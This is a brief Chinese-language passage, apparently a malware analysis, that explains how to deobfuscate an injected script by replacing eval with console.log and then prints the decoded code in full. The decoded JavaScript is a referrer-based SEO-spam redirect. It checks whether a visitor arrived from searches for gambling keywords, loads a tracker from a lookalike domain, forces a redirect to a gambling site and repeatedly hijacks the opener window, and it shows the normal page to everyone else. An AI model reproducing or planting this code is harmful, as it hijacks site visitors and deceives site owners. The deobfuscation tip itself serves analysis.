解密方法,将eval替换为console.log,然后将修改后的全部内容复制都Chrome控制台中
解密结果
function Redirect() {parent.window.opener.location = "http://www0.dangci999.com/"
}
var d = document.referrer
if ((d.indexOf("%B7%D1") > 0) || (d.indexOf("%E5%A8%B1%E4%B9%90%E5%9F%8E") > 0) || (d.indexOf("%BF%AA%BB%A7") > 0) || (d.indexOf("%E8%B5%8C%E5%8D%9A") > 0) || (d.indexOf("%E5%A8%B1%E4%B9%90") > 0) || (d.indexOf("%E5%8D%9A%E5%BD%A9") > 0) || (d.indexOf("%E7%99%BE%E5%AE%B6%E4%B9%90") > 0) || (d.indexOf("%E5%85%A8%E8%AE%AF%E7%BD%91") > 0) || (d.indexOf("%E7%9A%87%E5%86%A0") > 0) || (d.indexOf("%E6%80%BB%E7%BB%9F%E5%A8%B1%E4%B9%90%E5%9F%8E") > 0) || (d.indexOf("%E6%B5%B7%E7%8E%8B%E6%98%9F") > 0) || (d.indexOf("%E6%BE%B3%E9%97%A8%E8%B5%8C%E5%9C%BA") > 0) || (d.indexOf("%E8%B5%8C%E5%9C%BA") > 0) || (d.indexOf("%E6%8A%95%E6%B3%A8") > 0) || (d.indexOf("%e8%b5%8c") > 0) || (d.indexOf("%E9%AA%B0%E5%AE%9D") > 0) || (d.indexOf("%e5%8d%9a%e5%bd%a9") > 0) || (d.indexOf("%e6%a3%8b%e7%89%8c") > 0) || (d.indexOf("%E5%A8%B1%E4%B9%90%E5%9F%8E") > 0) || (d.indexOf("%e7%9c%9f%e4%ba%ba") > 0) || (d.indexOf("%e7%9c%9f%e9%92%b1") > 0) || (d.indexOf("%e7%8e%b0%e9%87%91") > 0) || (d.indexOf("%e5%bc%80%e6%88%b7") > 0) || (d.indexOf("%e5%bd%a9%e9%87%91") > 0) || (d.indexOf("%e6%8f%90%e7%8e%b0") > 0) || (d.indexOf("%e5%a4%aa%e9%98%b3%e5%9f%8e") > 0) || (d.indexOf("%e4%bd%93%e9%aa%8c%e9%87%91") > 0) || (d.indexOf("%E8%B6%B3%E7%90%83") > 0) || (d.indexOf("%E6%8A%95%E6%B3%A8") > 0) || (d.indexOf("%E8%B6%B3%E5%BD%A9") > 0) || (d.indexOf("%E7%99%BE%E5%AE%B6%E4%B9%90") > 0) || (d.indexOf("%E6%96%97%E5%9C%B0%E4%B8%BB") > 0) || (d.indexOf("%E8%BD%AE%E7%9B%98") > 0) || (d.indexOf("%E6%B3%A2%E9%9F%B3") > 0) || (d.indexOf("bbin") > 0) || (d.indexOf("%B6%C4%C7%F2") > 0) || (d.indexOf("%E6%B8%B8%E6%88%8F") > 0) || (d.indexOf("%E7%BC%85%E7%94%B8") > 0) || (d.indexOf("%E8%8F%B2%E5%BE%8B%E5%AE%BE") > 0) || (d.indexOf("bet") > 0) || (d.indexOf("%E5%88%A9%E6%9D%A5") > 0) || (d.indexOf("%E5%9B%BD%E9%99%85") > 0) || (d.indexOf("%E9%A2%9D%E5%BA%A6") > 0) || (d.indexOf("%E6%A3%8B%E7%89%8C") > 0) || (d.indexOf("%E9%BA%BB%E5%B0%86") > 0) || (d.indexOf("%E6%89%93%E7%89%8C") > 0) || (d.indexOf("%E6%96%97%E5%9C%B0%E4%B8%BB") > 0)) //判断指定关键词URL16进制加密
{
document.write('<script src="http://s17.cnzz.com.so/stat.js?id=3876164&web_id=3876164" language="JavaScript"></script>') //流量统计
document.writeln("<script>window.location.href=\'//www1.dangci999.com\'</script>.")
document.writeln("<div style='display:none'>")
setInterval("Redirect()", 1) //执行Redirect函数,打开延时单位毫秒
} else { //不满足指定关键词,载入原始网页
document.writeln("")
}